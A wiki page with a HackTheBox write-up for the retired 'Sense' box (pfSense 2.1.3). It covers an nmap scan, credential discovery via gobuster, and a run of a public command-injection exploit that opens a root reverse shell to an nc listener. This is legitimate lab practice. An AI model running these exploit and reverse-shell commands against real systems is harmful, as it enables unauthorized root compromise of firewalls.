Wiki
  • Init
  • NOTES
    • Windows Tricks
    • Enumeration Tricks
  • WRITEUPS
    • HackTheBox
      • Linux
        • Lame
        • Bashed
        • Shocker
        • Nibbles
        • Beep
        • Sense
        • Valentine
        • Blocky
        • Mirai
        • Popcorn
        • October
        • Bank
      • Windows
        • Devel
        • Blue
        • Jerry
        • Legacy
        • Optimum
        • Arctic
        • Bounty
        • Grandpa
        • Granny
        • Bastard
        • Silo
        • Jeeves
        • Access
        • Active
        • Querier
        • SecNotes
        • Chatterbox
    • Pwnable.kr
      • collision
      • fd
      • bof
      • flag
    • Exploit Education
      • Protostar
    • Rop Emporium
      • ret2win
      • split
      • callme
      • write4
      • badchars
      • fluff
      • pivot
  • Exploitation Practice
    • SLMail 5.5
    • FreeFloat FTP Server 1.0
  • Study Notes
    • Practical Binary Analysis
Powered by GitBook
On this page
  • Initial Enumeration
  • User and Root own
  • Learning outcome

Was this helpful?

  1. WRITEUPS
  2. HackTheBox
  3. Linux

Sense

OS: FreeBSD, Difficulty: Easy, IP: 10.10.10.60

Initial Enumeration

# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds

Checking out the page, it turns out it the login interface of pfsense and the default credentials of admin:pfsesne did not seem to work. So I ran gobuster on the URL and found a txt file called system-users.txt which contained the username rohit and password was supposed to be company default, so I chose to try pfsense and this combination got me into the dashboard.

As evident from the version information this is pfsense 2.1.3, so I ran this service and version info against searchsploit and found one command injection vulnerability.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***

Learning outcome

I need to find better word-list which are more comprehensive and thorough in terms of research. The ones I used, just barely got me through this time.

PreviousBeepNextValentine

Last updated 5 years ago

Was this helpful?